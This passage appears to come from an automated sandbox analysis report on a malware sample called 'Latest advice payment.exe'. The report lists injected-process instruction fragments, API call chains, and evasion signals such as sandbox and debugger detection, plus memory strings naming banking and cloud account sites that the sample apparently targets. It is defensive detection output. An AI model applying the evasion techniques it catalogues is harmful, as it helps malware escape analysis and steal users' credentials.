                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004181E4 push ds; retf 2_2_004181E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040218B push ebp; iretd 2_2_00402192
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D9B6 push FFFFFFEBh; iretd 2_2_0040D9BF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041AA30 push edx; retf 2_2_0041AA31
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004192F1 push edx; ret 2_2_004192F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00425433 push edi; ret 2_2_00425483
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403570 push eax; ret 2_2_00403572
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414658 push esp; ret 2_2_00414659
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414E8B pushfd ; iretd 2_2_00414E91
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040A7C3 push edi; ret 2_2_0040A7F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D7CA push ecx; ret 2_2_0040D7CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340225F pushad ; ret 2_2_034027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034027FA pushad ; ret 2_2_034027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034309AD push ecx; mov dword ptr [esp], ecx2_2_034309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340283D push eax; iretd 2_2_03402858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340135E push eax; iretd 2_2_03401369
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005648D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_005648D7
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005E5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_005E5376
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_00583187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00583187
                Source: C:\Users\user\Desktop\Latest advice payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Latest advice payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\Latest advice payment.exeAPI/Special instruction interceptor: Address: 10A55D4
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: Latest advice payment.exe, 00000000.00000002.2152825463.0000000001218000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE,
                Source: Latest advice payment.exe, 00000000.00000002.2152825463.0000000001218000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXES
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E rdtsc 2_2_0347096E
                Source: C:\Users\user\Desktop\Latest advice payment.exeAPI coverage: 4.4 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 420Thread sleep count: 43 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 420Thread sleep time: -86000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe TID: 7288Thread sleep time: -50000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe TID: 7288Thread sleep time: -36000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\bitsadmin.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005C445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_005C445A
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005CC6D1 FindFirstFileW,FindClose,0_2_005CC6D1
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005CC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_005CC75C
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005CEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_005CEF95
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005CF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_005CF0F2
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005CF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_005CF3F3
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005C37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_005C37EF
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005C3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_005C3B12
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005CBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_005CBCBC
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005649A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_005649A0
                Source: z5f52P3-.8.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: CWtKbasqHVKAO.exe, 0000000C.00000002.3990926739.00000000012FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
                Source: z5f52P3-.8.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: z5f52P3-.8.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: z5f52P3-.8.drBinary or memory string: discord.comVMware20,11696487552f
                Source: z5f52P3-.8.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: z5f52P3-.8.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: z5f52P3-.8.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: z5f52P3-.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: z5f52P3-.8.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: z5f52P3-.8.drBinary or memory string: global block list test formVMware20,11696487552
                Source: z5f52P3-.8.drBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: z5f52P3-.8.drBinary or memory string: AMC password management pageVMware20,11696487552
                Source: bitsadmin.exe, 00000008.00000002.3990678417.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000E.00000002.2733701787.000001F34964C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: z5f52P3-.8.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: z5f52P3-.8.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: z5f52P3-.8.drBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: z5f52P3-.8.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: z5f52P3-.8.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: z5f52P3-.8.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: z5f52P3-.8.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: z5f52P3-.8.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: z5f52P3-.8.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: z5f52P3-.8.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: z5f52P3-.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: z5f52P3-.8.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: z5f52P3-.8.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: z5f52P3-.8.drBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: z5f52P3-.8.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: z5f52P3-.8.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: z5f52P3-.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: z5f52P3-.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: z5f52P3-.8.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E rdtsc 2_2_0347096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417B23 LdrLoadDll,2_2_00417B23
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005D3F09 BlockInput,0_2_005D3F09
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_00563B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00563B3A
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_00595A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00595A7C
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_00564B37 LoadLibraryA,GetProcAddress,0_2_00564B37
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_010A41F0 mov eax, dword ptr fs:[00000030h]0_2_010A41F0
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_010A5840 mov eax, dword ptr fs:[00000030h]0_2_010A5840
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_010A58A0 mov eax, dword ptr fs:[00000030h]0_2_010A58A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov ecx, dword ptr fs:[00000030h]2_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FA352 mov eax, dword ptr fs:[00000030h]2_2_034FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D8350 mov ecx, dword ptr fs:[00000030h]2_2_034D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350634F mov eax, dword ptr fs:[00000030h]2_2_0350634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D437C mov eax, dword ptr fs:[00000030h]2_2_034D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]2_2_0346A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]2_2_0346A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]2_2_0346A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C310 mov ecx, dword ptr fs:[00000030h]2_2_0342C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450310 mov ecx, dword ptr fs:[00000030h]2_2_03450310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]2_2_03508324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov ecx, dword ptr fs:[00000030h]2_2_03508324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]2_2_03508324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]2_2_03508324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC3CD mov eax, dword ptr fs:[00000030h]2_2_034EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B63C0 mov eax, dword ptr fs:[00000030h]2_2_034B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]2_2_034DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]2_2_034DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov ecx, dword ptr fs:[00000030h]2_2_034DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]2_2_034DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]2_2_034D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]2_2_034D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034663FF mov eax, dword ptr fs:[00000030h]2_2_034663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]2_2_0345438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]2_2_0345438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B8243 mov eax, dword ptr fs:[00000030h]2_2_034B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B8243 mov ecx, dword ptr fs:[00000030h]2_2_034B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350625D mov eax, dword ptr fs:[00000030h]2_2_0350625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A250 mov eax, dword ptr fs:[00000030h]2_2_0342A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436259 mov eax, dword ptr fs:[00000030h]2_2_03436259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]2_2_034EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]2_2_034EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342826B mov eax, dword ptr fs:[00000030h]2_2_0342826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342823B mov eax, dword ptr fs:[00000030h]2_2_0342823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035062D6 mov eax, dword ptr fs:[00000030h]2_2_035062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]2_2_0346E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]2_2_0346E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov ecx, dword ptr fs:[00000030h]2_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
